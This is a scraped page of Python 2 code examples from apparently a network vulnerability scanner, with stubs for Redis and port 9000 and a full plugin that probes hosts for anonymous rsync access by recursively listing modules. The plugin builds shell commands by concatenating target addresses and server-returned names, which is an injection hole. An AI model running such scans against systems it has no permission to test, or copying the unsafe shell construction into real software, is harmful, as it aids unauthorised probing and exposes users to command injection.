     self.port_list = ['9000']
Ejemplo n.º 26
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
     self.service = 'redis'
     self.port_list = ['6379']
Ejemplo n.º 27
0
 def __init__(self):
     PluginBase.__init__(self)
     self.threadpool = ThreadPool(num_of_threads= 20 , num_of_work= 10 , daemon = True)
Ejemplo n.º 28
0
class RsyncUnauthPlugin(PluginBase):

    name = "RsyncUnauthPlugin"
    version = '1.0'
    description = 'rsync匿名访问'


    def __init__(self):
        PluginBase.__init__(self)
        self.threadpool = ThreadPool(num_of_threads= 10 , num_of_work= 10 , daemon = True)
        self.service = 'rsync'
        self.rsync_dic_path = '%s/%s' % (DATA_DIC_PATH, 'rsync_dic/rsync.dic') #chmod 600 rsync.dic
        print self.rsync_dic_path
        self.port_list = ['873']




    def execute_run(self, ip, port, taskid):
        if str(port) in self.port_list:
            logger.info('[rsync] ip:%s, port:%s' % (str(ip), str(port)))
            self.threadpool.add_job(self.run, ip, port)
            self.async_deal_into_db(taskid)


    def run(self, *args, **kwargs):
        global UNAUTH
        UNAUTH = False
        (ip, port) = args[0]
        if self.__test_rsyncunauth(ip):
            return {'ip':ip, 'port': port , 'status': True}
        else:
            return {'ip':ip, 'port': port , 'status': False}


    def __test_rsyncunauth(self, ip, data = ' '):
        '''
        验证是否存在rsync未授权访问漏洞
        :param url:
        :return:
        '''
        global UNAUTH
        cmd = 'rsync -v --password-file=' + self.rsync_dic_path + '--timeout=5 ' + ip + '::' + data
        print cmd
        (status, resp) = commands.getstatusoutput('rsync -v --password-file=' + self.rsync_dic_path + '  --timeout=5 ' + ip + '::' + data)
        if status == 0: #表示获取# 到敏感信息
            if resp == '':
                return UNAUTH
            resp_dic = resp.split(' \t\n')
            for item in resp_dic:
                re_result = re.search(r'[dwrx-]{10}\s+[\d]+\s+[\d]{4}\/[\d]{1,2}\/[\d]{1,2}\s+[0-5]\d:[0-5]\d:[0-5]\d\s+(.*)', item)
                if re_result is not None:
                    UNAUTH = True
                    break
                if item != ' ':
                    self.__test_rsyncunauth(ip, item[:item.find(' ')])
            return UNAUTH
        else:
            return UNAUTH

    def async_deal_into_db(self, taskid):
        '''
        异步入库
        :return:
        '''
        while not self.threadpool.resultQueue.empty():
            try:
                result_dit = self.threadpool.resultQueue.get_nowait()
                if result_dit['status']:
                    sysvul_dic = {}
                    sysvul_dic['sid']        = taskid
                    sysvul_dic['ip']         = result_dit['ip']
                    sysvul_dic['port']       = result_dit['port']
                    sysvul_dic['service']    = self.service
                    sysvul_dic['first_time'] = getCurTime()
                    print sysvul_dic['ip'] + "  success!!!"
                    #self.plugin_db.insert_by_dict(SYSVUL_TABLE, sysvul_dic)
            except:
                break

    def wait_for_complete(self, taskid):
        #PluginBase.wait_for_complete(self)
        self.async_deal_into_db(taskid)
        self.db_close()